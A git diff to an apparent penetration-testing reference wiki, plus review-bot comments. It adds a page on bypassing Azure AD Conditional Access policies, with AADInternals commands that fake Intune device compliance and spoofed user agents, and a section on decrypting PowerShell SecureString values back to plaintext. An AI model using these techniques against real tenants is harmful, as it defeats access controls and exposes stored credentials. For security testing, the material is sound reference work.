diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 63ba974..30b9cca 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -1,4 +1,4 @@ -# Azure AD Tokens +# Azure AD - Tokens ## Connection diff --git a/docs/cloud/azure/azure-ad-conditional-access-policy.md b/docs/cloud/azure/azure-ad-conditional-access-policy.md new file mode 100644 index 0000000..f0ac745 --- /dev/null +++ b/docs/cloud/azure/azure-ad-conditional-access-policy.md 
@@ -0,0 +1,62 @@ +# Azure AD - Conditional Access Policy + +Conditional Access is used to restrict access to resources to compliant devices only. + +* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) + +| CAP | Bypass | +|---------------------------|---------| +| Location / IP ranges | Corporate VPN, Guest Wifi | +| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | +| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | +| Azure AD Joined Device | Try to join a VM (Work Access)| +| Compliant Device (Intune) | Fake device compliance | +| Device requirement | / | +| MFA | / | +| Legacy Protocols | / | +| Domain Joined | / | + + +## Bypassing CAP by faking device compliance + +```powershell +# AAD Internals - Making your device compliant +# Get an access token for AAD join and save to cache +Get-AADIntAccessTokenForAADJoin -SaveToCache +# Join the device to Azure AD +Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" +# Marking device compliant - option 1: Registering device to Intune +# Get an access token for Intune MDM and save to cache (prompts for credentials) +Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache +# Join the device to Intune +Join-AADIntDeviceToIntune -DeviceName "SixByFour" +# Start the call back +Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" +``` + +## Bypassing CAP with device.trustType + +The trustType property is an internal attribute that defines the relationship between the device and Azure AD. 
+When the condition of CAP is `device.trustType -eq ""`, the values can be: + +* `AzureAD`: Azure AD joined devices +* `Workplace`: Azure AD registered devices +* `ServerAD`: Hybrid joined devices + + +## Bypassing CAP with user agent + +There are several devices you can use to authenticate and interact with a service. +Try several `User-Agent` to get access to the resources: + +* Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100` +* Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` +* macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` +* Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36` +* iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1` +* WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36` + + +## Bypassing CAP with location + +Try different IP locations using a VPN. \ No newline at end of file diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index def3cb5..66260f2 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -1,4 +1,4 @@ -# Azure AD Connect +# Azure AD - Azure AD Connect | Active Directory | Azure AD | |-----------------------------------|-------------------| diff --git a/docs/cloud/azure/azure-devices-users-sp.md b/docs/cloud/azure/azure-devices-users-sp.md index 277e7b2..6cd9788 100644 --- a/docs/cloud/azure/azure-devices-users-sp.md +++ b/docs/cloud/azure/azure-devices-users-sp.md 
@@ -1,4 +1,4 @@ -# Azure AD IAM +# Azure AD - IAM > Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index b823570..529520a 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -1,4 +1,4 @@ -# Azure AD Enumerate +# Azure AD - Enumerate ## Azure AD - Collectors 
@@ -199,43 +199,6 @@ Subdomain Service ``` -## Conditional Access Policy - -Conditional Access is used to restrict access to resources to compliant devices only. - -* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) - -| CAP | Bypass | -|---------------------------|---------| -| Location / IP ranges | Corporate VPN, Guest Wifi | -| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | -| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | -| Azure AD Joined Device | Try to join a VM (Work Access)| -| Compliant Device (Intune) | Fake device compliance | -| Device requirement | / | -| MFA | / | -| Legacy Protocols | / | -| Domain Joined | / | - - -Bypassing conditional access by faking device compliance - -```powershell -# AAD Internals - Making your device compliant -# Get an access token for AAD join and save to cache -Get-AADIntAccessTokenForAADJoin -SaveToCache -# Join the device to Azure AD -Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" -# Marking device compliant - option 1: Registering device to Intune -# Get an access token for Intune MDM and save to cache (prompts for credentials) -Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache -# Join the device to Intune -Join-AADIntDeviceToIntune -DeviceName "SixByFour" -# Start the call back -Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" -``` - - ## Multi Factor Authentication * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md index d1249ac..250a186 100644 --- a/docs/cloud/azure/azure-persistence.md +++ b/docs/cloud/azure/azure-persistence.md 
@@ -1,4 +1,4 @@ -# Azure Persistence +# Azure AD - Persistence ## Add Secrets to Application diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md index f8e246f..f92f108 100644 --- a/docs/cloud/azure/azure-phishing.md +++ b/docs/cloud/azure/azure-phishing.md @@ -1,4 +1,4 @@ -# Azure AD Phishing +# Azure AD - Phishing ## Illicit Consent Grant diff --git a/docs/cloud/azure/azure-requirements.md b/docs/cloud/azure/azure-requirements.md index 0633c4c..1753cf6 100644 --- a/docs/cloud/azure/azure-requirements.md +++ b/docs/cloud/azure/azure-requirements.md @@ -1,4 +1,4 @@ -# Azure Requirements +# Azure - Requirements ## Pentest Requirements diff --git a/docs/redteam/evasion/windows-defenses.md b/docs/redteam/evasion/windows-defenses.md index 736ea4d..a6dbd62 100644 --- a/docs/redteam/evasion/windows-defenses.md +++ b/docs/redteam/evasion/windows-defenses.md @@ -10,6 +10,7 @@ * [Just Enough Administration](#just-enough-administration) * [Contrained Language Mode](#constrained-language-mode) * [Script Block Logging](#script-block-logging) + * [SecureString](#securestring) * [Protected Process Light](#protected-process-light) * [Credential Guard](#credential-guard) * [Event Tracing for Windows](#event-tracing-for-windows) 
@@ -168,6 +169,37 @@ function Enable-PSScriptBlockLogging ``` +### SecureString + +A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access. + +Convert to SecureString + +```ps1 +$original = 'myPassword' +$secureString = ConvertTo-SecureString $original -AsPlainText -Force +$secureStringValue = ConvertFrom-SecureString $secureString +``` + +Get the original content + +```ps1 +$secureStringBack = $secureStringValue | ConvertTo-SecureString +$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack); +$finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr) +``` + +When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**) + +Using the AES key + +```ps1 +[Byte[]] $key = (49,222,...,87,159) +$pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key) +[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass)) +``` + + ## Protected Process Light Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.
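Review bot: In the new docs/cloud/azure/azure-ad-conditional-access-policy.md, the CAP table uses `/` in the Bypass column for five rows without saying what it means (no known bypass, or simply not covered here); state that above the table. In the same table, fix `acccess` to `access` and `e.g` to `e.g.`. In the "faking device compliance" block, the `.pfx` arguments embed a specific GUID (`.\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx` and the `-MDM.pfx` variant) with no explanation of where those files come from; say which step writes them and use a placeholder such as `<device-id>.pfx`, otherwise a reader looks for a file that does not exist. Under "Bypassing CAP with device.trustType", the heading promises a bypass but the body only documents the three attribute values; either explain how they relate to the `device.trustType -eq ""` condition shown or retitle the section as a reference for the attribute. The user-agent section's opening sentence reads oddly ("There are several devices you can use to authenticate"); something like "A service may accept sign-ins from several device platforms" is clearer. The file is also missing its trailing newline (`\ No newline at end of file`).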
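Review bot: azure-requirements.md is renamed to `# Azure - Requirements` while every other rename in this patch uses the `Azure AD - ` prefix; if the page intentionally covers Azure as a whole that is fine, otherwise align it so the pages sort together in the navigation.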
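Review bot: In the azure-enumeration.md hunk (`@@ -199,43 +199,6 @@`), the whole Conditional Access Policy section is removed but nothing on the enumeration page now points to its new home; add a one-line link to docs/cloud/azure/azure-ad-conditional-access-policy.md before the `## Multi Factor Authentication` heading so readers who knew the content from this page can still find it, and make sure any site navigation that lists the docs/cloud/azure pages includes the new file.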
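Review bot: The new `* [SecureString](#securestring)` TOC entry in windows-defenses.md is fine; while touching this list, also fix the adjacent entry text `Contrained Language Mode` to `Constrained Language Mode` (its anchor `#constrained-language-mode` is already spelled correctly).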
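Review bot: The SecureString section's claims that a `SecureString` "encrypts the data in memory" and that "the plain text characters are encrypted immediately using the Data Protection API (DPAPI)" need qualification: that describes Windows PowerShell on .NET Framework, and Microsoft's current guidance discourages SecureString for new code and notes the in-memory protection is not provided on all runtimes and platforms (PowerShell 7 on non-Windows in particular), so state which PowerShell the section is about; that sentence is also missing its terminal period. The "Using the AES key" block cannot be run as written because both `(49,222,...,87,159)` and `"AA...AA="` are elided; label them as placeholders, say that `-Key` must be 16, 24 or 32 bytes, and explain that this key is the one that was passed to `ConvertFrom-SecureString -Key` when the string was exported. That distinction is the defensive point worth making explicit: the earlier keyless `ConvertFrom-SecureString` output is DPAPI-protected and only the same user on the same machine can turn it back into a SecureString, whereas a `-Key`-protected string is portable and anyone holding the key can decrypt it. In the "Get the original content" block, release the unmanaged copy after reading it with `[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)` so the decrypted text is not left in memory, and prefer `"AA...AA=" | ConvertTo-SecureString -Key $key` over the `echo` alias for consistency with the pipeline style used two blocks earlier.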